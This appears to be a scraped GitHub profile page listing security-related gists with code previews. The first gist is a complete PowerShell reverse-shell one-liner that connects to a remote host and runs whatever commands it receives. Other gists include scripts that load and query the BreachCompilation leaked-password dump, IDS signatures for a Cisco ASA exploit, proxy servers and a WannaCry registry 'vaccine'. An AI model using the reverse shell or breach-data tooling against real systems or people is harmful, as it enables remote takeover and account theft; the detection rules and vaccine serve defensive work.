💭
☕️0dat RCE for everything's

51pwn hktalent

@egre55
egre55 / powershell_reverse_shell.ps1
Last active October 14, 2025 12:28
powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok
# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
@fox-srt
fox-srt / CVE-2018-0101.rules
Last active April 10, 2018 09:42
Cisco ASA RCE / CVE-2018-0101 IDS Signatures
# IDS signatures for https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180129-asa1:
alert udp any any -> any 500 (msg:"FOX-SRT - Suspicious - Possible Fragmented Cisco IKE/isakmp Packet HeapSpray (CVE-2018-0101)"; flow:to_server; content:"|84|"; offset:16; depth:1; content:"|02|"; distance:1; within:1; fast_pattern; byte_test:4,>,5000,5,relative; byte_test:2,>,5000,11,relative; byte_extract:4,36,fragment_match; byte_test:4,=,fragment_match,53,relative; byte_test:4,=,fragment_match,137,relative; byte_test:4,=,fragment_match,237,relative; threshold:type limit, track by_dst, count 1, seconds 600; classtype:attempted-admin; sid:21002339; rev:5;)
alert udp any any -> any 500 (msg:"FOX-SRT - Exploit - Possible Shellcode in Cisco IKE/isakmp - tcp/CONNECT/"; content:"tcp/CONNECT/"; fast_pattern:only; threshold:type limit, track by_src, count 1, seconds 600; priority:1; classtype:attempted-admin; sid:21002340; rev:2;)
@regevbr
regevbr / proxy-chain.js
Last active August 23, 2025 19:02
node-http-proxy proxy chain with connect method implemented (+ bonus auth handling)
"use strict";
const http = require('http');
const request = http.request;
const net = require('net');
const httpProxy = require('http-proxy');
let auth = "secret-string";
auth = Buffer.from(auth).toString('base64'); // Buffer.from replaces the deprecated new Buffer() constructor
auth = "Basic " + auth;
@youkergav
youkergav / import.py
Last active August 29, 2022 22:55
Python script to import BreachCompilation to PostgreSQL database.
# Define imports.
from time import time, strftime
from datetime import datetime
from glob import iglob
from os import path, system
from sys import exc_info
from subprocess import Popen, PIPE
from curses import initscr, noecho, cbreak, echo, nocbreak, endwin
from psycopg2 import connect
@poisa
poisa / query.sh
Created December 18, 2017 22:25
Query script for the BreachCompilation updated to work in OSX
#!/bin/bash
# bash is required: the script uses BASH_SOURCE and [[ ]] pattern matching
dir=$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )
if [ "$1" != "" ]; then
letter1=$(echo "$1" | tr '[:upper:]' '[:lower:]' | cut -b1)
if [[ $letter1 == [a-zA-Z0-9] ]]; then
if [ -f "$dir/data/$letter1" ]; then
grep -ai "^$1" "$dir/data/$letter1"
else
letter2=$(echo "$1" | tr '[:upper:]' '[:lower:]' | cut -b2)
@baymaxium
baymaxium / content.md
Created October 18, 2017 08:58
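12 Open-Source Tools Tightly Integrated with Docker

Original source: Docker

Docker has long been a focus for third-party developers, and many projects extend, complement or enhance Docker, from logging tools to database tools. In this article we therefore introduce some practical open-source third-party tools that will give your container development a boost. They are listed in no particular order.

1. Kubernetes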

@WangYihang
WangYihang / socks-proxy-simple.py
Last active June 4, 2022 04:11
A simple socks server via python
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# A simple Socks5 proxy server, server side only, and the code is rather messy
# Not very stable, and it uses multithreading rather than a select model
# Author : WangYihang <[email protected]>
import socket
import threading
import sys
#!/bin/bash
# variables
LOGFILE="/var/log/nginx/access.log"
LOGFILE_GZ="/var/log/nginx/access.log.*"
RESPONSE_CODE="200"
# functions
filters(){
grep $RESPONSE_CODE \
@mikewlange
mikewlange / ass
Created May 25, 2017 06:49
best way download a full site
BEST WAY TO DOWNLOAD FULL WEBSITE WITH WGET
I show two ways, the first way is just one command that doesn't run in the background - the second one runs in the background and in a different "shell" so you can get out of your ssh session and it will continue either way
First make a folder to download the websites to and begin your downloading: (note if downloading www.kossboss.com, you will get a folder like this: /websitedl/www.kossboss.com/ )
(STEP1)
mkdir /websitedl/
cd /websitedl/
(STEP2)
@Neo23x0
Neo23x0 / wannacry-vaccine.reg
Last active March 15, 2021 19:49
WannaCrypt Ransomware Immunisation
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskdl.exe]
"Debugger"="taskkill /F /IM "
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskse.exe]
"Debugger"="taskkill /F /IM "
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wannacry.exe]
"Debugger"="taskkill /F /IM "